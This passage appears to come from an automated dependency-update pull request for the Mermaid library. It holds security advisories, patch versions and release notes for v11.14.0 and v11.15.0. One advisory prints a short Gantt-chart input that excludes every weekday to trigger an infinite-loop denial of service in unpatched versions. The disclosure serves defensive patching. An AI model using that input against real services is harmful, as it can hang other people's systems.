"sandbox"`](https://mermaid.js.org/config/schema-docs/config.html#securitylevel) will also prevent this. ##### Credits Reported by @​zsxsoft on behalf of @​KeenSecurityLab #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:L/SI:L/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-87f9-hvmw-gh4p) - [https://github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa) - [https://github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76](https://redirect.github.com/mermaid-js/mermaid/commit/a9d9f0d8eb790349121508688cd338253fd80d76) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) - [https://github.com/advisories/GHSA-87f9-hvmw-gh4p](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-87f9-hvmw-gh4p) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Mermaid Gantt Charts are vulnerable to an Infinite Loop DoS [CVE-2026-41150](https://nvd.nist.gov/vuln/detail/CVE-2026-41150) / [GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh) <details> <summary>More information</summary> #### Details ##### Impact Mermaid v11.14.0 and earlier are vulnerable to a denial-of-service attack when rendering gantt charts, if they use the [`excludes` attribute](https://mermaid.js.org/syntax/gantt.html?#excludes) to exclude all dates. Example: ``` gantt excludes monday,tuesday,wednesday,thursday,friday,saturday,sunday DoS :2025-01-01, 1d ``` `mermaid.parse` is unaffected, unless you then call the `ganttDb.getTasks()` (which is called when rendering a diagram). ##### Patches This has been patched in: - [v11.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) (see [faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e)) - [v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) (see [a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6)) ##### Workarounds There are no workarounds available without updating to a newer version of mermaid. #### Severity - CVSS Score: 5.3 / 10 (Medium) - Vector String: `CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:L/SC:N/SI:N/SA:L` #### References - [https://github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/mermaid-js/mermaid/security/advisories/GHSA-6m6c-36f7-fhxh) - [https://github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6](https://redirect.github.com/mermaid-js/mermaid/commit/a59ea56174712ee5430dfd5bc877cb5151f501a6) - [https://github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e) - [https://github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) - [https://github.com/mermaid-js/mermaid/releases/tag/v10.9.6](https://redirect.github.com/mermaid-js/mermaid/releases/tag/v10.9.6) - [https://github.com/advisories/GHSA-6m6c-36f7-fhxh](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh) This data is provided by the [GitHub Advisory Database](https://redirect.github.com/advisories/GHSA-6m6c-36f7-fhxh) ([CC-BY 4.0](https://redirect.github.com/github/advisory-database/blob/main/LICENSE.md)). </details> --- ### Release Notes <details> <summary>mermaid-js/mermaid (mermaid)</summary> ### [`v11.15.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.15.0) [Compare Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.14.0...mermaid@11.15.0) ##### Minor Changes - [#​7174](https://redirect.github.com/mermaid-js/mermaid/pull/7174) [`0aca217`](https://redirect.github.com/mermaid-js/mermaid/commit/0aca21739c0d1fcaaa206e04a6cd574ebc415483) Thanks [@​milesspencer35](https://redirect.github.com/milesspencer35)! - feat(sequence): Add support for decimal start and increment values in the `autonumber` directive - [#​7512](https://redirect.github.com/mermaid-js/mermaid/pull/7512) [`8e17492`](https://redirect.github.com/mermaid-js/mermaid/commit/8e17492f7365ba50896382feb69a23efd9d8a22d) Thanks [@​aruncveli](https://redirect.github.com/aruncveli)! - feat(flowchart): add datastore shape In Data flow diagrams, a datastore/warehouse/file/database is used to represent data persistence. It is denoted by a rectangle with only top and bottom borders, and can be used in flowcharts with `A@{ shape: datastore, label: "Datastore" }`. - [#​6440](https://redirect.github.com/mermaid-js/mermaid/pull/6440) [`9ad8dde`](https://redirect.github.com/mermaid-js/mermaid/commit/9ad8dde6d049adde85d8ed2d476c09b5820f3f4b) Thanks [@​yordis](https://redirect.github.com/yordis), [@​lgazo](https://redirect.github.com/lgazo)! - feat: add Event Modeling diagram - [#​7707](https://redirect.github.com/mermaid-js/mermaid/pull/7707) [`27db774`](https://redirect.github.com/mermaid-js/mermaid/commit/27db774627be1cee881961dfd0d2cb21cd01b79d) Thanks [@​txmxthy](https://redirect.github.com/txmxthy)! - feat(architecture): expose four fcose layout knobs for `architecture-beta` diagrams (`nodeSeparation`, `idealEdgeLengthMultiplier`, `edgeElasticity`, `numIter`) so authors can tune layout density and spread overlapping siblings without changing diagram source - [#​7604](https://redirect.github.com/mermaid-js/mermaid/pull/7604) [`bf9502f`](https://redirect.github.com/mermaid-js/mermaid/commit/bf9502fb6012a4b724679b401ac928f5ee55161c) Thanks [@​M-a-c](https://redirect.github.com/M-a-c)! - feat(class): add nested namespace support for class diagrams via dot notation and syntactic nesting If you have namespaces in class diagrams that use `.`s already and want to render them without nesting (≤v11.14.0 behaviour), you can use set `class.hierarchicalNamespaces=false` in your mermaid config: ```yaml config: class: hierarchicalNamespaces: false ``` - [#​7272](https://redirect.github.com/mermaid-js/mermaid/pull/7272) [`88cdd3d`](https://redirect.github.com/mermaid-js/mermaid/commit/88cdd3dc0aab9577174561b04e14760c565a232b) Thanks [@​xinbenlv](https://redirect.github.com/xinbenlv)! - feat(sankey): add outlined label style, configurable nodeWidth/nodePadding, and custom node colors ##### Patch Changes - [#​7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737) [`e9b0f34`](https://redirect.github.com/mermaid-js/mermaid/commit/e9b0f34d8d82a6260077764ee45e1d7d90957a0f) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix: prevent unbalanced CSS styles in classDefs - [#​7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737) [`37ff937`](https://redirect.github.com/mermaid-js/mermaid/commit/37ff937f1da2e19f882fd1db01235db4d01f4056) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix: create CSS styles using the CSSOM This removes some invalid CSS and normalizes some CSS formatting. - [#​7508](https://redirect.github.com/mermaid-js/mermaid/pull/7508) [`bfe60cc`](https://redirect.github.com/mermaid-js/mermaid/commit/bfe60cc67b9a6dec64f9161f58e4d24a06c42b65) Thanks [@​biiab](https://redirect.github.com/biiab)! - fix(stateDiagram): `end note` now only closes a note when used on a new line - [#​7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737) [`faafb5d`](https://redirect.github.com/mermaid-js/mermaid/commit/faafb5d49106dd32c367f3882505f2dd625aa30e) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix(gantt): add iteration limit for `excludes` field - [#​7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737) [`65f8be2`](https://redirect.github.com/mermaid-js/mermaid/commit/65f8be2a42faf869b811469571983cba7eeeca99) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix: disallow some CSS at-rules in custom CSS - [#​7726](https://redirect.github.com/mermaid-js/mermaid/pull/7726) [`1502f32`](https://redirect.github.com/mermaid-js/mermaid/commit/1502f32f3c5fb944925b0c527fbbde3c4f041824) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix(wardley): fix unnecessary sanitization of text - [#​7578](https://redirect.github.com/mermaid-js/mermaid/pull/7578) [`1f98db8`](https://redirect.github.com/mermaid-js/mermaid/commit/1f98db8e326299ac97a2fa60abfd509d8f5f16e2) Thanks [@​Gaston202](https://redirect.github.com/Gaston202)! - fix(class): self-referential class multiplicity labels no longer rendered multiple times Fixes [#​7560](https://redirect.github.com/mermaid-js/mermaid/issues/7560). Resolves an issue where cardinality labels on self-referential class relationships were rendered three times due to edge splitting in the dagre layout. The fix ensures that each sub-edge only carries its relevant label positions. - [#​7592](https://redirect.github.com/mermaid-js/mermaid/pull/7592) [`2343e38`](https://redirect.github.com/mermaid-js/mermaid/commit/2343e38498a3b31f8ce5e79f1f009e0b56fbe086) Thanks [@​knsv-bot](https://redirect.github.com/knsv-bot)! - fix(sequence): add background box behind alt/else section title labels in sequence diagrams - [#​7589](https://redirect.github.com/mermaid-js/mermaid/pull/7589) [`7fb9509`](https://redirect.github.com/mermaid-js/mermaid/commit/7fb9509b8b5cb1dc48519dc60cf6cdc6afba0462) Thanks [@​NYCU-Chung](https://redirect.github.com/NYCU-Chung)! - fix(block): prevent column widths from shrinking when mixing different column spans - [#​7632](https://redirect.github.com/mermaid-js/mermaid/pull/7632) [`3f9e0f1`](https://redirect.github.com/mermaid-js/mermaid/commit/3f9e0f15bedc1e2c71ddb6b34192d1a21124cfc2) Thanks [@​ekiauhce](https://redirect.github.com/ekiauhce)! - fix(sequence): correct messageAlign label position for right-to-left arrows in sequence diagrams - [#​7642](https://redirect.github.com/mermaid-js/mermaid/pull/7642) [`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445) Thanks [@​tractorjuice](https://redirect.github.com/tractorjuice)! - fix(wardley): allow hyphens in unquoted component names Multi-word names containing hyphens — e.g. `real-time processing`, `end-user`, `on-call engineer` — now parse without quoting, bringing the grammar in line with the OnlineWardleyMaps (OWM) convention. `A->B` (no-space arrow) still tokenises correctly. - [#​7523](https://redirect.github.com/mermaid-js/mermaid/pull/7523) [`5144ed4`](https://redirect.github.com/mermaid-js/mermaid/commit/5144ed4b138ae0f4836bab4c163c575e0a767dd3) Thanks [@​darshanr0107](https://redirect.github.com/darshanr0107)! - fix(block): Arrow blocks in block-beta diagrams not spanning the specified number of columns when using `:n` syntax. - [#​7262](https://redirect.github.com/mermaid-js/mermaid/pull/7262) [`13d9bfa`](https://redirect.github.com/mermaid-js/mermaid/commit/13d9bfa4748e845a9eec7d6265ba496d2278f26e) Thanks [@​darshanr0107](https://redirect.github.com/darshanr0107)! - fix(block): Ensure block diagram hexagon blocks respect column spanning syntax - [#​7684](https://redirect.github.com/mermaid-js/mermaid/pull/7684) [`e14bb88`](https://redirect.github.com/mermaid-js/mermaid/commit/e14bb88bdb940124cdb0a107025653bf93745c99) Thanks [@​aloisklink](https://redirect.github.com/aloisklink)! - fix: loosen `uuid` dependency range to allow v14 Mermaid does not use any of the vulnerable code in CVE-2026-41907, but this allows users to silence any `npm audit` alerts on it. - [#​7633](https://redirect.github.com/mermaid-js/mermaid/pull/7633) [`9217c0d`](https://redirect.github.com/mermaid-js/mermaid/commit/9217c0d8b221b423af80e420b7adae901acf6c8c) Thanks [@​Felix-Garci](https://redirect.github.com/Felix-Garci)! - fix(block): add support for all arrow types in block diagrams - [#​7587](https://redirect.github.com/mermaid-js/mermaid/pull/7587) [`5e7eb62`](https://redirect.github.com/mermaid-js/mermaid/commit/5e7eb62e3aba6b5df559f5c839a868e5b7f40e72) Thanks [@​MaddyGuthridge](https://redirect.github.com/MaddyGuthridge)! - chore: drop lodash-es in favour of es-toolkit - [#​7693](https://redirect.github.com/mermaid-js/mermaid/pull/7693) [`afaf306`](https://redirect.github.com/mermaid-js/mermaid/commit/afaf3062381d115d66744413151b642f124dd9ba) Thanks [@​dull-bird](https://redirect.github.com/dull-bird)! - fix(quadrant-chart): allow CJK, emoji, Latin-1 accented characters, and other non-ASCII text in unquoted axis/quadrant/point labels. Previously the lexer only matched ASCII `[A-Za-z]+` for text tokens, even though the grammar referenced `UNICODE_TEXT`. Bare Chinese, Japanese, Korean, emoji, and accented Latin characters in labels caused a parse error. Added a `[^\x00-\x7F]+` lexer rule to emit `UNICODE_TEXT` and included it in the `alphaNumToken` grammar rule. Fixes [#​7120](https://redirect.github.com/mermaid-js/mermaid/issues/7120). - [#​7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737) [`4755553`](https://redirect.github.com/mermaid-js/mermaid/commit/4755553d5fb6d1217809e43ffb8fc54d6a73e482) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix: improve D3 types for mermaidAPI funcs - [#​7737](https://redirect.github.com/mermaid-js/mermaid/pull/7737) [`6476973`](https://redirect.github.com/mermaid-js/mermaid/commit/64769738d5b59211e1decb471ffbaca8afec51aa) Thanks [@​ashishjain0512](https://redirect.github.com/ashishjain0512)! - fix: handle `&` when namespacing CSS rules - [#​7520](https://redirect.github.com/mermaid-js/mermaid/pull/7520) [`8c1a0c1`](https://redirect.github.com/mermaid-js/mermaid/commit/8c1a0c1fd19587c6772d6966fe9d217e5cd1356c) Thanks [@​RodrigojndSantos](https://redirect.github.com/RodrigojndSantos)! - fix(stateDiagram): comments starting with one `%` are no longer treated as comments Switch to using two `%%` if you want to write a comment. - Updated dependencies \[[`7a8fb85`](https://redirect.github.com/mermaid-js/mermaid/commit/7a8fb8532c57ecc55b3711454ab0e505a4291445), [`675a64c`](https://redirect.github.com/mermaid-js/mermaid/commit/675a64ca0e3cde8728ca715991623c3fc055ce88)]: - [@​mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@​1.1.1 ### [`v11.14.0`](https://redirect.github.com/mermaid-js/mermaid/releases/tag/mermaid%4011.14.0) [Compare Source](https://redirect.github.com/mermaid-js/mermaid/compare/mermaid@11.13.0...mermaid@11.14.0) Thanks to our awesome mermaid community that contributed to this release: [@​ashishjain0512](https://redirect.github.com/ashishjain0512), [@​tractorjuice](https://redirect.github.com/tractorjuice), [@​autofix-ci\[bot\]](https://redirect.github.com/autofix-ci%5Bbot%5D), [@​aloisklink](https://redirect.github.com/aloisklink), [@​knsv](https://redirect.github.com/knsv), [@​kibanana](https://redirect.github.com/kibanana), [@​chandershekhar22](https://redirect.github.com/chandershekhar22), [@​khalil](https://redirect.github.com/khalil), [@​ytatsuno](https://redirect.github.com/ytatsuno), [@​sidharthv96](https://redirect.github.com/sidharthv96), [@​github-actions\[bot\]](https://redirect.github.com/github-actions%5Bbot%5D), [@​dripcoding](https://redirect.github.com/dripcoding), [@​knsv-bot](https://redirect.github.com/knsv-bot), [@​jeroensmink98](https://redirect.github.com/jeroensmink98), [@​Alex9583](https://redirect.github.com/Alex9583), [@​GhassenS](https://redirect.github.com/GhassenS), [@​omkarht](https://redirect.github.com/omkarht), [@​darshanr0107](https://redirect.github.com/darshanr0107), [@​leentaylor](https://redirect.github.com/leentaylor), [@​lee-treehouse](https://redirect.github.com/lee-treehouse), [@​veeceey](https://redirect.github.com/veeceey), [@​turntrout](https://redirect.github.com/turntrout), [@​Mermaid-Chart](https://redirect.github.com/Mermaid-Chart), [@​BambioGaming](https://redirect.github.com/BambioGaming), Claude ### Releases #### [@​mermaid-js/examples](https://redirect.github.com/mermaid-js/examples)@​1.2.0 ##### Minor Changes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - add new TreeView diagram #### mermaid\@​11.14.0 ##### Minor Changes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - Add Wardley Maps diagram type (beta) Adds Wardley Maps as a new diagram type to Mermaid (available as `wardley-beta`). Wardley Maps are visual representations of business strategy that help map value chains and component evolution. Features: - Component positioning with \[visibility, evolution] coordinates (OWM format) - Anchors for users/customers - Multiple link types: dependencies, flows, labeled links - Evolution arrows and trend indicators - Custom evolution stages with optional dual labels - Custom stage widths using [@​boundary](https://redirect.github.com/boundary) notation - Pipeline components with visibility inheritance - Annotations, notes, and visual elements - Source strategy markers: build, buy, outsource, market - Inertia indicators - Theme integration Implementation includes parser, D3.js renderer, unit tests, E2E tests, and comprehensive documentation. - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for state diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look support for sequence diagrams with drop shadows, and enhanced styling - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: add `randomize` config option for architecture diagrams, defaulting to `false` for deterministic layout - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: Add option to change timeline direction - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - Fix duplicate SVG element IDs when rendering multiple diagrams on the same page. Internal element IDs (nodes, edges, markers, clusters) are now prefixed with the diagram's SVG element ID across all diagram types. Custom CSS or JS using exact ID selectors like `#arrowhead` should use attribute-ending selectors like `[id$="-arrowhead"]` instead. - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for ER diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for requirement diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: add theme support for data label colour in xy chart - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for mindmap diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look for mermaid flowchart diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look and themes for class diagram - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: add showDataLabelOutsideBar option for xy chart - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look support for timeline diagram with drop shadows, additoinal redux themes and enhanced styling - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look and themes for gitGraph diagram - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - add new TreeView diagram ##### Patch Changes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - add link to ishikawa diagram on mermaid.js.org - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - docs: document valid duration token formats in gantt.md - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: ER diagram parsing when using "1" as entity identifier on right side The parser was incorrectly tokenizing the second "1" in patterns like `a many to 1 1:` because the lookahead rule only checked for alphabetic characters after whitespace, not digits. Added a new lookahead pattern `"1"(?=\s+[0-9])` to correctly identify the cardinality alias before a numeric entity name. Fixes [#​7472](https://redirect.github.com/mermaid-js/mermaid/issues/7472) - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: scope cytoscape label style mapping to edges with labels to prevent console warnings - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: support inline annotation syntax in class diagrams (class Shape <<interface>>) - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: Align branch label background with text for multi-line labels in LR GitGraph layout - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: preserve cause hierarchy when ishikawa effect is indented more than causes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - refactor: remove unused createGraphWithElements function and add regression test for open edge arrowheads - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: Prevent long pie chart titles from being clipped by expanding the viewBox - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: prevent sequence diagram hang when "as" is used without a trailing space in participant declarations - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: warn when `style` statement targets a non-existent node in flowcharts - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: group state diagram SVG children under single root <g> element - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: Allow :::className syntax inside composite state blocks - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) Thanks [@​aloisklink](https://redirect.github.com/aloisklink), [@​BambioGaming](https://redirect.github.com/BambioGaming)! - fix: prevent escaping `<` and `&` when `htmlLabels: false` - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - fix: treemap title and labels use theme-aware colors for dark backgrounds - Updated dependencies \[[`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519)]: - [@​mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@​1.1.0 #### [@​mermaid-js/parser](https://redirect.github.com/mermaid-js/parser)@​1.1.0 ##### Minor Changes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - add new TreeView diagram #### [@​mermaid-js/tiny](https://redirect.github.com/mermaid-js/tiny)@​11.14.0 ##### Minor Changes - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - Add Wardley Maps diagram type (beta) Adds Wardley Maps as a new diagram type to Mermaid (available as `wardley-beta`). Wardley Maps are visual representations of business strategy that help map value chains and component evolution. Features: - Component positioning with \[visibility, evolution] coordinates (OWM format) - Anchors for users/customers - Multiple link types: dependencies, flows, labeled links - Evolution arrows and trend indicators - Custom evolution stages with optional dual labels - Custom stage widths using [@​boundary](https://redirect.github.com/boundary) notation - Pipeline components with visibility inheritance - Annotations, notes, and visual elements - Source strategy markers: build, buy, outsource, market - Inertia indicators - Theme integration Implementation includes parser, D3.js renderer, unit tests, E2E tests, and comprehensive documentation. - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for state diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look support for sequence diagrams with drop shadows, and enhanced styling - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: add `randomize` config option for architecture diagrams, defaulting to `false` for deterministic layout - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: Add option to change timeline direction - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - Fix duplicate SVG element IDs when rendering multiple diagrams on the same page. Internal element IDs (nodes, edges, markers, clusters) are now prefixed with the diagram's SVG element ID across all diagram types. Custom CSS or JS using exact ID selectors like `#arrowhead` should use attribute-ending selectors like `[id$="-arrowhead"]` instead. - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for ER diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for requirement diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: add theme support for data label colour in xy chart - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look styling for mindmap diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look for mermaid flowchart diagrams - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look and themes for class diagram - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: add showDataLabelOutsideBar option for xy chart - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look support for timeline diagram with drop shadows, additoinal redux themes and enhanced styling - [#​7526](https://redirect.github.com/mermaid-js/mermaid/pull/7526) [`efe218a`](https://redirect.github.com/mermaid-js/mermaid/commit/efe218a47fb5a4c2bd5489b48ce69213b141e519) - feat: implement neo look and 